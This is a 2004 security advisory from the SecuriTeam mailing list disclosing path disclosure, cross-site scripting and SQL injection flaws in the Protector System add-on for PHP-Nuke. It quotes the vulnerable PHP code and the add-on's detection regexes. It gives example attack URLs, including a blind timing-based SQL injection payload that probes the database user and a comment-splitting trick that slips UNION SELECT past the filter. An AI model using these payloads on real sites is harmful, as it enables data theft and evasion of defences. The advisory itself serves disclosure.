[UNIX] Protector System Multiple Vulnerabilities

• Previous message: SecuriTeam: "[NEWS] Yahoo! Mail Account Filter Overflow Hijack"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 25 Apr 2004 19:15:05 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Protector System Multiple Vulnerabilities
------------------------------------------------------------------------

SUMMARY

Protector is a PHP-Nuke add-on that enables blocking of IP addresses and
several types of attacks such as SQL injections and others.

Several classes of vulnerabilities have been found in Protector. Among
them are path disclosure, cross-site scripting and SQL injection attacks.

DETAILS

Vulnerable Systems:
 * Protector System for PHP-Nuke version 1.15b1 and prior

Full Path Disclosure
In the integrated network query tool the variable portNum is unchecked.
Issuing a bad command will cause PHP to return error messages with the
full path of the system in question.

An example URL could look something along the lines of:
http://localhost/nuke72/admin/modules/blocker_query.php?target=foobar.com&queryType=all&portNum=foobar

And will result in the following error message:
Warning: fsockopen() expects parameter 2 to be long, string given in
D:\apache_wwwroot\nuke72\admin\modules\blocker_query.php on line 305 Port
foobar does not appear to be open.

Cross-site Scripting
The 'target' variable is not properly sanitized. This allows an attacker
to cause a XSS vulnerability.

An example URL:
http://localhost/nuke72/admin/modules/blocker_query.php?target=foobar.com">[xss code here]

SQL Injection
The script 'blocker.php' is vulnerable to an SQL injection attack.

Looking at /includes/blocker.php line 252:
if( isset( $_SERVER ) ) { $ref_addr = $_SERVER['HTTP_REFERER']; }
    else { $ref_addr = getenv( 'HTTP_REFERER' ); }
 
    if( isset( $_SERVER ) )
    {
        $last_page = $_SERVER['SCRIPT_NAME'];
        if (($_SERVER['QUERY_STRING']) != "") { $last_page = $last_page .
"?" . $_SERVER['QUERY_STRING'] ;}
        $query_blocker = $_SERVER['QUERY_STRING'] ;
    }
    else
    {
        $last_page = getenv(SCRIPT_NAME);
        if ((getenv(QUERY_STRING)) != "") { $last_page = $last_page . "?"
 getenv(QUERY_STRING) ;}
    }
        $last_page = urldecode($last_page);

The $last_page variable contains the value of a URL decoded QUERY_STRING.
If we were to add to the query something like %27, the urldecode()
function will return a single quote in it's place, opening the way for an
SQL injection. Looking further:
        ###################################
        #Page Tracker Function by Kipuka
        #
        ###################################
        if ($tracker_del_on == 1) {
        $max_tracker_check = $db->sql_query("SELECT count(*) as count FROM
".$prefix."_blocked_pagetracker WHERE id_tracker = '$access_id'");
        $numrows = $db->sql_numrows($max_tracker_check);

        if ($numrows > 0) {
        list($count) = $db->sql_fetchrow($max_tracker_check);
        }
        //die("$last_page");
        if ($count < $tracker_max_b) {
            $db->sql_query("INSERT DELAYED INTO
".$prefix."_blocked_pagetracker (last_page ,page_date ,id_tracker) VALUES
('$last_page', '$date', '$access_id')");

            $sqlx = "INSERT DELAYED INTO ".$prefix."_blocked_pagetracker
(last_page ,page_date ,id_tracker) VALUES ('$last_page', '$date',
'$access_id')";
            $xxx = mysql_error();
            //die("$xxx");

        } else {
            $tracker_limitB = $count - $tracker_max_b;
            $result = $db->sql_query("SELECT id FROM
".$prefix."_blocked_pagetracker WHERE id_tracker = '$access_id' ORDER BY
page_date LIMIT ".$tracker_limitB.",1");
            $numrows = $db->sql_numrows($result);
            if ($numrows > 0) {
                $row = $db->sql_fetchrow($result);
                $page_id = $row['id'];
                $db->sql_query("DELETE FROM
".$prefix."_blocked_pagetracker WHERE id_tracker = '$access_id' AND id <=
'$page_id'");
            }
            $xxx = mysql_error();
            die("$xxx");
            $db->sql_query("INSERT INTO ".$prefix."_blocked_pagetracker
(last_page ,page_date ,id_tracker) VALUES ('$last_page', '$date',
'$access_id')");
            }
        }

An SQL injection is indeed possible but not using a "SELECT FROM" command
but rather using the "INSERT INTO" command.
 
On the other hand, usage of some built-in commands of MySQL can help an
attacker perform interesting things. Some notable functions:
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
VERSION()

Since the attacker doesn't have a visual feedback from the script, only
"blindfolded" attacks can be used, such as the following (easily
implemented in PHP, Perl, Python):
http://localhost/nuke72/index.php?foobar%27,IF(ord(mid(USER(),1,1))%3d114,benchmark(500000,md5(1337)),1),2)/*

Bypassing of SQL Injection Filters
The Protector system implements several filters to prevent SQL injections
and XSS attacks:
..

//IF the user sending any ?$_SERVER["HTTP_REFERER"] then continue
if (strlen($_SERVER["HTTP_REFERER"]) > 0) {
   //If the user is POSTing from another server do a scan
if(eregi("(^|[^a-zA-Z0-9])union(\ )+(all\ |distinct\ )?(\ )*select\
|\.\.\/", $sTemp) && !ereg("(http://$_SERVER[HTTP_HOST])",
$_SERVER["HTTP_REFERER"]))
    {
        $original_ip = long2ip(-(4294967296-$ipcheck));
        $the_error = "User $the_blocked_user with IP $original_ip tried to
send information thru a POST method\r\n"
..
if(eregi("(^|[^a-zA-Z0-9])union(\ )+(all\ |distinct\ )?(\ )*select\
|\.\.\/", $sTemp))
    {
    //Just send a mail incase =)
    if ($pro_mail && $pro_mail != '' && $mail_blocker == '1') {
mail($pro_mail, $blocker_subject, $the_unset_error, $headers); }
    unset($_POST[$FormFieldName]);
    echo "<p><h1>Your Attempt to use SQL exploit was blocked</h1>";
    echo "<i>Powered whit Protector System</i>";
    die();
    }
    }
?
if($sec_cookieB == '1')
{
foreach ($_COOKIE as $cookie_name => $value_cookie) {
  $result = $db ->sql_query("SELECT cookie FROM ".$prefix."_blocked_agent
WHERE cookie = '$cookie_name'");
  if($db->sql_numrows($result)>0 && !empty($_COOKIE))
  {
    if (eregi("union\ |&#?[a-zA-Z0-9]+;|:\/\/|\.\.\/|[$<>{}\(\)\"'`]",
$value_cookie)) {
    $value_cookie = htmlspecialchars($value_cookie, ENT_QUOTES);
    setcookie($cookie_name,"", time() - 3600);
    unset($_COOKIE[$cookie_name]);
  }
}
..
###########################################################################
#Block unvanted GET code!
#Security scan of REQUEST_METHOD GET
#
############################################################################
if($sec_getB == '1')
{
if ((eregi("admin.php", $_SERVER['PHP_SELF']) && preg_match("/\?admin/",
"$last_page")) OR (eregi("(^|[^a-zA-Z0-9])union(\ )+(all\ |distinct\ )?(\
)*select\ |\.\.\/", $last_page)) OR (stristr($last_page, "admin=")))
{
..

Not only GET, but also POST and COOKIE variables benefit from the
sanitation. However there are some evasion techniques, some of which can
be found at <http://www.securiteam.com/securityreviews/5FP0O0KCKM.html>
SQL Injection Signatures Evasion (The paper describes various methods that
can be used to circumvent SQL injection filters).

Implementing these evasion techniques, one can issue a request such as
this:
http://localhost/nuke72/index.php?foo=bar%20UNION%20SELECT%20ALL%20FROM%20WHERE

Which will cause Protector to complain that the 127.0.0.1 IP has been
blocked for use. However, structuring the query a bit different:
http://localhost/nuke72/index.php?foo=bar%20U/**/NION%20SELECT%20ALL%20FROM%20WHERE

Will give the desired results. The filter lets the query pass.

ADDITIONAL INFORMATION

The information has been provided by <mailto:come2waraxe@yahoo.com> Janek
Vind.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NEWS] Yahoo! Mail Account Filter Overflow Hijack"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]